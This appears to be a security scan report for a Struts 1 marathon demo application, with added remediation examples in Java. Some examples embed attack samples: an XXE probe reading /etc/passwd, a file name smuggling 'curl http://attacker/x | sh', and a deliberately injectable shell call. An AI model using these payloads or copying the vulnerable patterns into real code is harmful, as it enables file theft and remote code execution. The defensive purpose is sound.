SAST Scans #4
Annotations
155 warnings
BC_UNCONFIRMED_CAST:
src/main/java/demo/action/ChangePasswordAction.java#L30
Unchecked/unconfirmed cast from org.apache.struts.action.ActionForm to demo.form.ChangePasswordForm in demo.action.ChangePasswordAction.execute(ActionMapping, ActionForm, HttpServletRequest, HttpServletResponse)
|
IMPROPER_UNICODE:
src/main/java/demo/action/ChangePasswordAction.java#L31
Improper handling of Unicode transformations such as case mapping and normalization.
|
SERVLET_PARAMETER:
src/main/java/demo/action/ChangePasswordAction.java#L37
The method getParameter returns a String value that is controlled by the client
|
STRUTS1_ENDPOINT:
src/main/java/demo/action/ChangePasswordAction.java#L22
demo.action.ChangePasswordAction is a Struts 1 endpoint (Action)
|
BC_UNCONFIRMED_CAST:
src/main/java/demo/action/CreateAccountAction.java#L29
Unchecked/unconfirmed cast from org.apache.struts.action.ActionForm to demo.form.CreateAccountForm in demo.action.CreateAccountAction.execute(ActionMapping, ActionForm, HttpServletRequest, HttpServletResponse)
|
STRUTS1_ENDPOINT:
src/main/java/demo/action/CreateAccountAction.java#L20
demo.action.CreateAccountAction is a Struts 1 endpoint (Action)
|
SERVLET_PARAMETER:
src/main/java/demo/action/DeleteAllResultsAction.java#L33
The method getParameter returns a String value that is controlled by the client
|
SERVLET_PARAMETER:
src/main/java/demo/action/DeleteAllResultsAction.java#L37
The method getParameter returns a String value that is controlled by the client
|
STRUTS1_ENDPOINT:
src/main/java/demo/action/DeleteAllResultsAction.java#L23
demo.action.DeleteAllResultsAction is a Struts 1 endpoint (Action)
|
STRUTS1_ENDPOINT:
src/main/java/demo/action/EditResultsViaImportAction.java#L14
demo.action.EditResultsViaImportAction is a Struts 1 endpoint (Action)
|
STRUTS1_ENDPOINT:
src/main/java/demo/action/EditRunnerPhotoAction.java#L19
demo.action.EditRunnerPhotoAction is a Struts 1 endpoint (Action)
|
SERVLET_PARAMETER:
src/main/java/demo/action/LoadDynamicRunnerDetailsAction.java#L32
The method getParameter returns a String value that is controlled by the client
|
STRUTS1_ENDPOINT:
src/main/java/demo/action/LoadDynamicRunnerDetailsAction.java#L19
demo.action.LoadDynamicRunnerDetailsAction is a Struts 1 endpoint (Action)
|
STRUTS1_ENDPOINT:
src/main/java/demo/action/LogoutAction.java#L16
demo.action.LogoutAction is a Struts 1 endpoint (Action)
|
BC_UNCONFIRMED_CAST:
src/main/java/demo/action/SearchRunnerAction.java#L29
Unchecked/unconfirmed cast from org.apache.struts.action.ActionForm to demo.form.SearchRunnerForm in demo.action.SearchRunnerAction.execute(ActionMapping, ActionForm, HttpServletRequest, HttpServletResponse)
|
STRUTS1_ENDPOINT:
src/main/java/demo/action/SearchRunnerAction.java#L21
demo.action.SearchRunnerAction is a Struts 1 endpoint (Action)
|
STRUTS1_ENDPOINT:
src/main/java/demo/action/ShowMarathonsAction.java#L20
demo.action.ShowMarathonsAction is a Struts 1 endpoint (Action)
|
SERVLET_PARAMETER:
src/main/java/demo/action/ShowResultsAction.java#L29
The method getParameter returns a String value that is controlled by the client
|
SERVLET_PARAMETER:
src/main/java/demo/action/ShowResultsAction.java#L38
The method getParameter returns a String value that is controlled by the client
|
STRUTS1_ENDPOINT:
src/main/java/demo/action/ShowResultsAction.java#L19
demo.action.ShowResultsAction is a Struts 1 endpoint (Action)
|
INFORMATION_EXPOSURE_THROUGH_AN_ERROR_MESSAGE:
src/main/java/demo/action/ShowRunnerAction.java#L42
Possible information exposure through an error message
|
REC_CATCH_EXCEPTION:
src/main/java/demo/action/ShowRunnerAction.java#L41
Exception is caught when Exception is not thrown in demo.action.ShowRunnerAction.execute(ActionMapping, ActionForm, HttpServletRequest, HttpServletResponse)
|
SERVLET_PARAMETER:
src/main/java/demo/action/ShowRunnerAction.java#L28
The method getParameter returns a String value that is controlled by the client
|
STRUTS1_ENDPOINT:
src/main/java/demo/action/ShowRunnerAction.java#L19
demo.action.ShowRunnerAction is a Struts 1 endpoint (Action)
|
BC_UNCONFIRMED_CAST:
src/main/java/demo/action/ShowRunnerAttendancesAction.java#L46
Unchecked/unconfirmed cast from org.apache.struts.action.ActionForm to demo.form.RunnerAttendancesForm in demo.action.ShowRunnerAttendancesAction.execute(ActionMapping, ActionForm, HttpServletRequest, HttpServletResponse)
|
STRUTS1_ENDPOINT:
src/main/java/demo/action/ShowRunnerAttendancesAction.java#L23
demo.action.ShowRunnerAttendancesAction is a Struts 1 endpoint (Action)
|
BC_UNCONFIRMED_CAST:
src/main/java/demo/action/ShowRunnerProfileAction.java#L58
Unchecked/unconfirmed cast from org.apache.struts.action.ActionForm to demo.form.RunnerForm in demo.action.ShowRunnerProfileAction.execute(ActionMapping, ActionForm, HttpServletRequest, HttpServletResponse)
|
HTTPONLY_COOKIE:
src/main/java/demo/action/ShowRunnerProfileAction.java#L67
Cookie without the HttpOnly flag could be read by a malicious script in the browser
|
HTTP_RESPONSE_SPLITTING:
src/main/java/demo/action/ShowRunnerProfileAction.java#L67
This use of javax/servlet/http/Cookie.<init>(Ljava/lang/String;Ljava/lang/String;)V might be used to include CRLF characters into HTTP headers
|
INSECURE_COOKIE:
src/main/java/demo/action/ShowRunnerProfileAction.java#L67
Cookie without the secure flag could be sent in clear text if a HTTP URL is visited
|
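The three findings on ShowRunnerProfileAction.java#L67 attach to a single new Cookie(name, value) call: the value can carry CR/LF into the Set-Cookie header, and the cookie is emitted without HttpOnly or Secure. The following is an added example, not the project's code; the class name, the value alphabet and the one-hour lifetime are assumptions, and setHttpOnly requires the Servlet 3.0 API or later.

```java
import java.util.regex.Pattern;
import javax.servlet.http.Cookie;
import javax.servlet.http.HttpServletResponse;

// Added example (not the project's code): one helper that addresses
// HTTP_RESPONSE_SPLITTING, HTTPONLY_COOKIE and INSECURE_COOKIE together.
public final class SafeCookies {

    // Conservative value alphabet. CR, LF, ';', ',' and whitespace are all
    // excluded, so a value that passes cannot terminate the header early or
    // smuggle additional cookie attributes. Assumed for this example.
    private static final Pattern COOKIE_VALUE = Pattern.compile("[A-Za-z0-9._~+/=-]{1,256}");

    private SafeCookies() {}

    public static boolean isSafeValue(String value) {
        return value != null && COOKIE_VALUE.matcher(value).matches();
    }

    // Validates here rather than relying on whatever header checks the
    // container performs, so the behaviour is the same on every container.
    public static void addHardenedCookie(HttpServletResponse resp, String name, String value) {
        if (!isSafeValue(value)) {
            throw new IllegalArgumentException("cookie value not in allowed alphabet");
        }
        Cookie c = new Cookie(name, value);
        c.setHttpOnly(true);   // not readable through document.cookie (Servlet 3.0+)
        c.setSecure(true);     // only transmitted over TLS
        c.setPath("/");
        c.setMaxAge(60 * 60);  // one hour; assumed, tune to the session policy
        resp.addCookie(c);
    }
}
```

If the value is a server-generated token (session or profile reference) rather than the runner's own data, it will already fit the alphabet above; client-derived text should be mapped to such a token server-side rather than validated into a cookie, which is also the remedy for the later COOKIE_USAGE findings.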
SERVLET_PARAMETER:
src/main/java/demo/action/ShowRunnerProfileAction.java#L35
The method getParameter returns a String value that is controlled by the client
|
STRUTS1_ENDPOINT:
src/main/java/demo/action/ShowRunnerProfileAction.java#L21
demo.action.ShowRunnerProfileAction is a Struts 1 endpoint (Action)
|
STRUTS1_ENDPOINT:
src/main/java/demo/action/ShowUnregisteredAction.java#L18
demo.action.ShowUnregisteredAction is a Struts 1 endpoint (Action)
|
BC_UNCONFIRMED_CAST:
src/main/java/demo/action/UpdateResultsAction.java#L27
Unchecked/unconfirmed cast from org.apache.struts.action.ActionForm to demo.form.ResultsForm in demo.action.UpdateResultsAction.execute(ActionMapping, ActionForm, HttpServletRequest, HttpServletResponse)
|
STRUTS1_ENDPOINT:
src/main/java/demo/action/UpdateResultsAction.java#L19
demo.action.UpdateResultsAction is a Struts 1 endpoint (Action)
|
BC_UNCONFIRMED_CAST:
src/main/java/demo/action/UpdateResultsViaImportAction.java#L38
Unchecked/unconfirmed cast from org.apache.struts.action.ActionForm to demo.form.ResultsImportForm in demo.action.UpdateResultsViaImportAction.execute(ActionMapping, ActionForm, HttpServletRequest, HttpServletResponse)
|
DM_CONVERT_CASE:
src/main/java/demo/action/UpdateResultsViaImportAction.java#L41
Use of non-localized String.toUpperCase() or String.toLowerCase() in demo.action.UpdateResultsViaImportAction.execute(ActionMapping, ActionForm, HttpServletRequest, HttpServletResponse)
|
IMPROPER_UNICODE:
src/main/java/demo/action/UpdateResultsViaImportAction.java#L42
Improper handling of Unicode transformations such as case mapping and normalization.
|
STRUTS1_ENDPOINT:
src/main/java/demo/action/UpdateResultsViaImportAction.java#L30
demo.action.UpdateResultsViaImportAction is a Struts 1 endpoint (Action)
|
XXE_DOCUMENT:
src/main/java/demo/action/UpdateResultsViaImportAction.java#L52
The use of DocumentBuilder.parse(...) (DocumentBuilder) is vulnerable to XML External Entity attacks
|
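The XXE_DOCUMENT finding is on the DocumentBuilder.parse(...) call that reads an imported results file. A DocumentBuilder obtained from a default DocumentBuilderFactory resolves external entities, so a DOCTYPE in the upload can read local files or reach internal hosts. The following is an added example, not the project's code, of the factory configuration that closes this; the class name and the probe document are constructed for the example.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.SAXException;

// Added example, not the project's code: a DocumentBuilder configured so that an
// imported results file cannot pull in external entities or expand a hostile DTD.
public final class SafeXml {

    private SafeXml() {}

    public static DocumentBuilder hardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        // Refusing any DOCTYPE is the strongest single setting: it stops external
        // entities (file and network reads) and entity expansion ("billion laughs").
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth for parsers that do not honour the feature above.
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        // JAXP 1.5 (Java 8+): block external DTD and schema access at the factory level too.
        f.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        f.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        return f.newDocumentBuilder();
    }

    public static Document parseImport(InputStream in)
            throws ParserConfigurationException, SAXException, IOException {
        return hardenedBuilder().parse(in);
    }

    // Constructed probe document: with a default builder the <name> element
    // would contain the server's /etc/passwd; with the hardened builder the
    // parse fails on the DOCTYPE before any entity is resolved.
    static final String XXE_PROBE =
          "<?xml version=\"1.0\"?>"
        + "<!DOCTYPE r [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]>"
        + "<results><runner><name>&xxe;</name></runner></results>";

    public static void main(String[] args) throws Exception {
        try {
            parseImport(new ByteArrayInputStream(XXE_PROBE.getBytes(StandardCharsets.UTF_8)));
            System.out.println("parsed; hardening is NOT in effect");
        } catch (SAXException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The same features apply to SAXParserFactory and XMLInputFactory if the import code is later switched to a streaming parser; the scanner reports each parse site separately, so each one needs its own hardened factory.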
BC_UNCONFIRMED_CAST:
src/main/java/demo/action/UpdateRunnerAttendancesAction.java#L37
Unchecked/unconfirmed cast from org.apache.struts.action.ActionForm to demo.form.RunnerAttendancesForm in demo.action.UpdateRunnerAttendancesAction.execute(ActionMapping, ActionForm, HttpServletRequest, HttpServletResponse)
|
DLS_DEAD_LOCAL_STORE:
src/main/java/demo/action/UpdateRunnerAttendancesAction.java#L86
Dead store to $L5 in demo.action.UpdateRunnerAttendancesAction.deserializeInput(String)
|
INFORMATION_EXPOSURE_THROUGH_AN_ERROR_MESSAGE:
src/main/java/demo/action/UpdateRunnerAttendancesAction.java#L64
Possible information exposure through an error message
|
OBJECT_DESERIALIZATION:
src/main/java/demo/action/UpdateRunnerAttendancesAction.java#L86
Object deserialization is used in demo.action.UpdateRunnerAttendancesAction.deserializeInput(String)
|
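OBJECT_DESERIALIZATION on deserializeInput(String) means a client-supplied string is turned back into Java objects with ObjectInputStream. Without a filter, any serializable class on the classpath can be instantiated during readObject(), which is how gadget-chain attacks obtain code execution. The following is an added example, not the project's code; it assumes the input is Base64, that the expected payload is a list of a hypothetical demo.pojo.Attendance class, and a Java 9 or later runtime for ObjectInputFilter.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.util.Base64;
import java.util.List;

// Added example (not the project's code): reading a Base64-encoded serialized
// payload from a request parameter behind a class allow-list.
public final class AttendanceInput {

    // Only the types the form is expected to carry are admitted; "!*" rejects
    // every other class, so a gadget chain cannot be materialised. The limits
    // bound memory and recursion for a malformed payload. demo.pojo.Attendance
    // is a hypothetical class name for this example.
    private static final ObjectInputFilter FILTER = ObjectInputFilter.Config.createFilter(
            "maxdepth=8;maxarray=1000;maxrefs=2000;"
          + "demo.pojo.Attendance;java.util.ArrayList;java.lang.Long;java.lang.String;!*");

    private static final int MAX_BYTES = 64 * 1024;   // assumed upper bound for this form

    private AttendanceInput() {}

    // Vulnerable pattern: whatever class the stream names gets instantiated.
    @SuppressWarnings("unchecked")
    public static List<Object> deserializeUnfiltered(String b64)
            throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(
                new ByteArrayInputStream(Base64.getDecoder().decode(b64)))) {
            return (List<Object>) in.readObject();
        }
    }

    // Hardened: size cap before decoding, filter installed before the first
    // readObject(), and the root type checked before the cast.
    @SuppressWarnings("unchecked")
    public static List<Object> deserializeFiltered(String b64)
            throws IOException, ClassNotFoundException {
        byte[] raw = Base64.getDecoder().decode(b64);
        if (raw.length > MAX_BYTES) {
            throw new IOException("payload too large");
        }
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(raw))) {
            in.setObjectInputFilter(FILTER);
            Object o = in.readObject();          // filter rejects with InvalidClassException
            if (!(o instanceof List)) {
                throw new IOException("unexpected root type " + o.getClass().getName());
            }
            return (List<Object>) o;
        }
    }
}
```

The filter is a containment measure. The durable fix for a form submitted by a browser is to stop accepting Java serialization from the client altogether and parse a JSON or form-encoded representation into the POJO explicitly.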
SERVLET_PARAMETER:
src/main/java/demo/action/UpdateRunnerAttendancesAction.java#L50
The method getParameter returns a String value that is controlled by the client
|
SERVLET_PARAMETER:
src/main/java/demo/action/UpdateRunnerAttendancesAction.java#L59
The method getParameter returns a String value that is controlled by the client
|
STRUTS1_ENDPOINT:
src/main/java/demo/action/UpdateRunnerAttendancesAction.java#L27
demo.action.UpdateRunnerAttendancesAction is a Struts 1 endpoint (Action)
|
BC_UNCONFIRMED_CAST:
src/main/java/demo/action/UpdateRunnerPhotoAction.java#L86
Unchecked/unconfirmed cast from org.apache.struts.action.ActionForm to demo.form.RunnerPhotoForm in demo.action.UpdateRunnerPhotoAction.execute(ActionMapping, ActionForm, HttpServletRequest, HttpServletResponse)
|
COMMAND_INJECTION:
src/main/java/demo/action/UpdateRunnerPhotoAction.java#L196
This usage of java/lang/Runtime.exec(Ljava/lang/String;)Ljava/lang/Process; can be vulnerable to Command Injection
|
COMMAND_INJECTION:
src/main/java/demo/action/UpdateRunnerPhotoAction.java#L201
This usage of java/lang/Runtime.exec([Ljava/lang/String;[Ljava/lang/String;Ljava/io/File;)Ljava/lang/Process; can be vulnerable to Command Injection
|
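The two COMMAND_INJECTION findings sit in the upload path of UpdateRunnerPhotoAction, which also carries a getVirusScannerScript(ServletContext) method, so the page supports the reading that an external scanner script is run against the uploaded file. The following is an added example, not the project's code; the scanner path, the name alphabet, the timeout and the scanner's exit-code convention are assumptions, and ProcessBuilder.Redirect.DISCARD needs Java 9 or later.

```java
import java.io.File;
import java.io.IOException;
import java.util.List;
import java.util.concurrent.TimeUnit;
import java.util.regex.Pattern;

// Added example, not the project's code: running an external virus-scanner
// script on an uploaded photo without letting the uploader shape the command line.
public final class ScannerInvoker {

    // Hypothetical scanner location. In the project it comes from
    // getVirusScannerScript(ServletContext); that lookup is not reproduced here.
    private static final File SCANNER = new File("/opt/demo/bin/scan.sh");
    private static final Pattern SAFE_NAME = Pattern.compile("[A-Za-z0-9][A-Za-z0-9._-]{0,63}");

    private ScannerInvoker() {}

    // Vulnerable pattern: the file name is spliced into a line that a shell
    // parses, so "photo.jpg; curl http://attacker/x | sh" runs a second command.
    // The single-String exec(String) form is no better: the JVM splits it on
    // whitespace, so a name containing spaces injects extra arguments.
    public static Process scanVulnerable(String uploadedName) throws IOException {
        return Runtime.getRuntime().exec(new String[] {
                "sh", "-c", SCANNER.getPath() + " " + uploadedName });
    }

    // Hardened: no shell, an argv list handed straight to execve, a strict
    // name alphabet, "--" so a name starting with "-" is not read as an option,
    // a scrubbed environment and a timeout.
    public static int scanSafely(File uploadDir, String uploadedName)
            throws IOException, InterruptedException {
        if (!SAFE_NAME.matcher(uploadedName).matches()) {
            throw new IllegalArgumentException("rejected file name");
        }
        File target = new File(uploadDir, uploadedName);
        ProcessBuilder pb = new ProcessBuilder(List.of(
                SCANNER.getAbsolutePath(), "--", target.getAbsolutePath()));
        pb.environment().clear();                              // do not inherit the container's environment
        pb.environment().put("PATH", "/usr/bin:/bin");
        pb.redirectErrorStream(true);
        pb.redirectOutput(ProcessBuilder.Redirect.DISCARD);    // no pipe to drain, so no reader thread
        Process p = pb.start();
        if (!p.waitFor(30, TimeUnit.SECONDS)) {
            p.destroyForcibly();
            throw new IOException("scanner timed out");
        }
        return p.exitValue();                                  // assumed: 0 clean, non-zero otherwise
    }
}
```

If the scanner's output is needed (the role of the StreamGobbler flagged later under DM_DEFAULT_ENCODING), read it with an explicit charset, for example new InputStreamReader(p.getInputStream(), StandardCharsets.UTF_8), from a separate thread started before waitFor, so the child cannot block on a full pipe.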
DM_CONVERT_CASE:
src/main/java/demo/action/UpdateRunnerPhotoAction.java#L40
Use of non-localized String.toUpperCase() or String.toLowerCase() in demo.action.UpdateRunnerPhotoAction.<static initializer for UpdateRunnerPhotoAction>()
|
DM_CONVERT_CASE:
src/main/java/demo/action/UpdateRunnerPhotoAction.java#L117
Use of non-localized String.toUpperCase() or String.toLowerCase() in demo.action.UpdateRunnerPhotoAction.checkAndSaveImage(File, Upload, String, String, File)
|
IMPROPER_UNICODE:
src/main/java/demo/action/UpdateRunnerPhotoAction.java#L117
Improper handling of Unicode transformations such as case mapping and normalization.
|
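DM_CONVERT_CASE and IMPROPER_UNICODE land on the same line of checkAndSaveImage, which is consistent with a case-folded comparison on an uploaded file name. The point of both warnings is that String.toLowerCase() without a Locale follows the JVM's default locale, and that a comparison done before Unicode normalization can disagree with what the file system later sees. The following is an added example, not the project's code; the allowed extensions and the name alphabet are assumptions.

```java
import java.text.Normalizer;
import java.util.Locale;
import java.util.Set;

// Added example, not the project's code: an upload-extension check written the
// way DM_CONVERT_CASE and IMPROPER_UNICODE warn about, beside a stable version.
public final class ExtensionCheck {

    private static final Set<String> ALLOWED = Set.of("jpg", "jpeg", "png", "gif");   // assumed

    private ExtensionCheck() {}

    // Locale-dependent: under a tr_TR default locale the "I" in "PHOTO.GIF"
    // lower-cases to dotless "ı", the extension becomes "gıf" and the check
    // silently fails. A check written the other way round (upper-casing and
    // comparing) fails in the opposite direction and can admit a name the rest
    // of the code never expected.
    public static boolean allowedLocaleDependent(String filename) {
        String lower = filename.toLowerCase();
        int dot = lower.lastIndexOf('.');
        return dot >= 0 && ALLOWED.contains(lower.substring(dot + 1));
    }

    // Stable: NFKC first (folds fullwidth and other compatibility forms to their
    // ASCII equivalents), then a fixed-locale case map, then an ASCII allow-list
    // so no later transformation can change the meaning. Returns the normalized
    // name, which is the one to store and use downstream, or null to reject.
    public static String normalizedIfAllowed(String filename) {
        String n = Normalizer.normalize(filename, Normalizer.Form.NFKC).toLowerCase(Locale.ROOT);
        if (!n.matches("[a-z0-9][a-z0-9._-]{0,63}")) {
            return null;
        }
        int dot = n.lastIndexOf('.');
        return dot >= 0 && ALLOWED.contains(n.substring(dot + 1)) ? n : null;
    }

    public static void main(String[] args) {
        Locale.setDefault(Locale.forLanguageTag("tr-TR"));   // constructed worst-case default locale
        String[] names = { "PHOTO.GIF", "photo.\uFF47if", "photo.php" };   // second name has a fullwidth "g"
        for (String name : names) {
            System.out.println(name + " -> locale-dependent: " + allowedLocaleDependent(name)
                             + ", stable: " + normalizedIfAllowed(name));
        }
    }
}
```

The important design choice is that the value that passed the check is the value that gets used afterwards; validating one string and then storing the original is the pattern the IMPROPER_UNICODE detector is describing.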
INFORMATION_EXPOSURE_THROUGH_AN_ERROR_MESSAGE:
src/main/java/demo/action/UpdateRunnerPhotoAction.java#L146
Possible information exposure through an error message
|
PATH_TRAVERSAL_IN:
src/main/java/demo/action/UpdateRunnerPhotoAction.java#L135
This API (java/io/File.<init>(Ljava/io/File;Ljava/lang/String;)V) reads a file whose location might be specified by user input
|
PATH_TRAVERSAL_IN:
src/main/java/demo/action/UpdateRunnerPhotoAction.java#L48
This API (java/io/File.<init>(Ljava/lang/String;)V) reads a file whose location might be specified by user input
|
PATH_TRAVERSAL_IN:
src/main/java/demo/action/UpdateRunnerPhotoAction.java#L65
This API (java/io/File.<init>(Ljava/lang/String;)V) reads a file whose location might be specified by user input
|
RV_RETURN_VALUE_IGNORED_BAD_PRACTICE:
src/main/java/demo/action/UpdateRunnerPhotoAction.java#L149
Exceptional return value of java.io.File.delete() ignored in demo.action.UpdateRunnerPhotoAction.checkAndSaveImage(File, Upload, String, String, File)
|
RV_RETURN_VALUE_IGNORED_BAD_PRACTICE:
src/main/java/demo/action/UpdateRunnerPhotoAction.java#L133
Exceptional return value of java.io.File.mkdir() ignored in demo.action.UpdateRunnerPhotoAction.checkAndSaveImage(File, Upload, String, String, File)
|
RV_RETURN_VALUE_IGNORED_BAD_PRACTICE:
src/main/java/demo/action/UpdateRunnerPhotoAction.java#L51
Exceptional return value of java.io.File.mkdirs() ignored in demo.action.UpdateRunnerPhotoAction.getPhotoFolder(ServletContext)
|
RV_RETURN_VALUE_IGNORED_BAD_PRACTICE:
src/main/java/demo/action/UpdateRunnerPhotoAction.java#L69
Exceptional return value of java.io.File.mkdirs() ignored in demo.action.UpdateRunnerPhotoAction.getVirusScannerScript(ServletContext)
|
STRUTS1_ENDPOINT:
src/main/java/demo/action/UpdateRunnerPhotoAction.java#L36
demo.action.UpdateRunnerPhotoAction is a Struts 1 endpoint (Action)
|
DM_DEFAULT_ENCODING:
src/main/java/demo/action/UpdateRunnerPhotoAction.java#L176
Found reliance on default encoding in demo.action.UpdateRunnerPhotoAction$StreamGobbler.run(): new java.io.InputStreamReader(InputStream)
|
BC_UNCONFIRMED_CAST:
src/main/java/demo/action/UpdateRunnerPhotoViaImportAction.java#L41
Unchecked/unconfirmed cast from org.apache.struts.action.ActionForm to demo.form.RunnerPhotoImportForm in demo.action.UpdateRunnerPhotoViaImportAction.execute(ActionMapping, ActionForm, HttpServletRequest, HttpServletResponse)
|
OBL_UNSATISFIED_OBLIGATION_EXCEPTION_EDGE:
src/main/java/demo/action/UpdateRunnerPhotoViaImportAction.java#L95
demo.action.UpdateRunnerPhotoViaImportAction.saveFileFromURL(URL, File) may fail to clean up java.io.OutputStream on checked exception
|
OS_OPEN_STREAM_EXCEPTION_PATH:
src/main/java/demo/action/UpdateRunnerPhotoViaImportAction.java#L95
demo.action.UpdateRunnerPhotoViaImportAction.saveFileFromURL(URL, File) may fail to close stream on exception
|
RV_RETURN_VALUE_IGNORED_BAD_PRACTICE:
src/main/java/demo/action/UpdateRunnerPhotoViaImportAction.java#L83
Exceptional return value of java.io.File.delete() ignored in demo.action.UpdateRunnerPhotoViaImportAction.fetchPhoto(String, String)
|
STRUTS1_ENDPOINT:
src/main/java/demo/action/UpdateRunnerPhotoViaImportAction.java#L29
demo.action.UpdateRunnerPhotoViaImportAction is a Struts 1 endpoint (Action)
|
URLCONNECTION_SSRF_FD:
src/main/java/demo/action/UpdateRunnerPhotoViaImportAction.java#L89
This web server request could be used by an attacker to expose internal services and filesystem.
|
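URLCONNECTION_SSRF_FD on saveFileFromURL(URL, File) flags a server-side fetch of a URL that ultimately comes from the client (fetchPhoto(String, String) passes it down). Without checks, the server can be pointed at http://127.0.0.1, at a cloud metadata address, or at file:// paths. The following is an added example, not the project's code; the host allow-list, the size cap and the timeouts are assumptions, and InputStream.readNBytes needs Java 11 or later.

```java
import java.io.IOException;
import java.io.InputStream;
import java.net.HttpURLConnection;
import java.net.InetAddress;
import java.net.URI;
import java.net.URISyntaxException;
import java.net.URL;
import java.util.Locale;
import java.util.Set;

// Added example, not the project's code: fetching a runner photo from a
// client-supplied URL with scheme, host and address checks.
public final class PhotoFetcher {

    // Hypothetical allow-list; a real deployment would load it from configuration.
    private static final Set<String> ALLOWED_HOSTS = Set.of("photos.example.org");
    private static final int MAX_BYTES = 5 * 1024 * 1024;   // assumed

    private PhotoFetcher() {}

    // Rejects loopback, link-local (includes 169.254.169.254), RFC 1918 and
    // multicast. Note that isSiteLocalAddress() covers IPv6 fec0::/10 only,
    // not fc00::/7; add an explicit check if IPv6 ULA ranges are in use.
    static boolean isPublicAddress(InetAddress a) {
        return !(a.isAnyLocalAddress() || a.isLoopbackAddress() || a.isLinkLocalAddress()
              || a.isSiteLocalAddress() || a.isMulticastAddress());
    }

    public static URL validate(String raw) throws IOException {
        URI uri;
        try {
            uri = new URI(raw).normalize();
        } catch (URISyntaxException e) {
            throw new IOException("malformed url");
        }
        // https only: rules out file:, jar:, ftp: and cleartext http.
        if (!"https".equalsIgnoreCase(uri.getScheme())) throw new IOException("scheme not allowed");
        if (uri.getUserInfo() != null) throw new IOException("userinfo not allowed");
        String host = uri.getHost();
        if (host == null || !ALLOWED_HOSTS.contains(host.toLowerCase(Locale.ROOT))) {
            throw new IOException("host not allowed");
        }
        // An allowed name must still not resolve to an internal address
        // (hijacked record, or a name deliberately pointed inside).
        for (InetAddress a : InetAddress.getAllByName(host)) {
            if (!isPublicAddress(a)) throw new IOException("host resolves to internal address");
        }
        return uri.toURL();
    }

    public static byte[] fetch(String raw) throws IOException {
        HttpURLConnection c = (HttpURLConnection) validate(raw).openConnection();
        c.setInstanceFollowRedirects(false);   // a redirect could point anywhere the checks above excluded
        c.setConnectTimeout(5_000);
        c.setReadTimeout(10_000);
        if (c.getResponseCode() != 200) throw new IOException("unexpected status " + c.getResponseCode());
        try (InputStream in = c.getInputStream()) {
            byte[] data = in.readNBytes(MAX_BYTES + 1);
            if (data.length > MAX_BYTES) throw new IOException("photo too large");
            return data;
        }
    }
}
```

One caveat a reviewer should record: the address check and the connection resolve the name separately, so a DNS answer that changes between the two (rebinding) can slip through. Closing that window fully means connecting to the address that was checked, which needs a custom socket or DNS layer; the host allow-list is what makes the residual risk small here.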
BC_UNCONFIRMED_CAST:
src/main/java/demo/action/UpdateRunnerProfileAction.java#L40
Unchecked/unconfirmed cast from org.apache.struts.action.ActionForm to demo.form.RunnerForm in demo.action.UpdateRunnerProfileAction.execute(ActionMapping, ActionForm, HttpServletRequest, HttpServletResponse)
|
DLS_DEAD_LOCAL_STORE:
src/main/java/demo/action/UpdateRunnerProfileAction.java#L77
Dead store to someMap in demo.action.UpdateRunnerProfileAction.unmarshalInput(String)
|
DM_DEFAULT_ENCODING:
src/main/java/demo/action/UpdateRunnerProfileAction.java#L73
Found reliance on default encoding in demo.action.UpdateRunnerProfileAction.unmarshalInput(String): new String(byte[])
|
INFORMATION_EXPOSURE_THROUGH_AN_ERROR_MESSAGE:
src/main/java/demo/action/UpdateRunnerProfileAction.java#L59
Possible information exposure through an error message
|
SERVLET_PARAMETER:
src/main/java/demo/action/UpdateRunnerProfileAction.java#L54
The method getParameter returns a String value that is controlled by the client
|
STRUTS1_ENDPOINT:
src/main/java/demo/action/UpdateRunnerProfileAction.java#L27
demo.action.UpdateRunnerProfileAction is a Struts 1 endpoint (Action)
|
OBL_UNSATISFIED_OBLIGATION_EXCEPTION_EDGE:
src/main/java/demo/dao/AttendanceDAO.java#L27
demo.dao.AttendanceDAO.loadAttendingMarathons(Runner) may fail to clean up java.sql.Statement on checked exception
|
OBL_UNSATISFIED_OBLIGATION_EXCEPTION_EDGE:
src/main/java/demo/dao/AttendanceDAO.java#L57
demo.dao.AttendanceDAO.updateAttendances(Runner, List) may fail to clean up java.sql.Statement on checked exception
|
ODR_OPEN_DATABASE_RESOURCE_EXCEPTION_PATH:
src/main/java/demo/dao/AttendanceDAO.java#L27
demo.dao.AttendanceDAO.loadAttendingMarathons(Runner) may fail to close database resource on exception
|
ODR_OPEN_DATABASE_RESOURCE_EXCEPTION_PATH:
src/main/java/demo/dao/AttendanceDAO.java#L58
demo.dao.AttendanceDAO.updateAttendances(Runner, List) may fail to close database resource on exception
|
DE_MIGHT_IGNORE:
src/main/java/demo/dao/DAOUtils.java#L40
demo.dao.DAOUtils.isAlive() might ignore java.sql.SQLException
|
INFORMATION_EXPOSURE_THROUGH_AN_ERROR_MESSAGE:
src/main/java/demo/dao/DAOUtils.java#L34
Possible information exposure through an error message
|
OBL_UNSATISFIED_OBLIGATION_EXCEPTION_EDGE:
src/main/java/demo/dao/MarathonDAO.java#L26
demo.dao.MarathonDAO.loadMarathons() may fail to clean up java.sql.Statement on checked exception
|
ODR_OPEN_DATABASE_RESOURCE_EXCEPTION_PATH:
src/main/java/demo/dao/MarathonDAO.java#L26
demo.dao.MarathonDAO.loadMarathons() may fail to close database resource on exception
|
ODR_OPEN_DATABASE_RESOURCE_EXCEPTION_PATH:
src/main/java/demo/dao/ResultsDAO.java#L30
demo.dao.ResultsDAO.loadResults(String, boolean) may fail to close database resource on exception
|
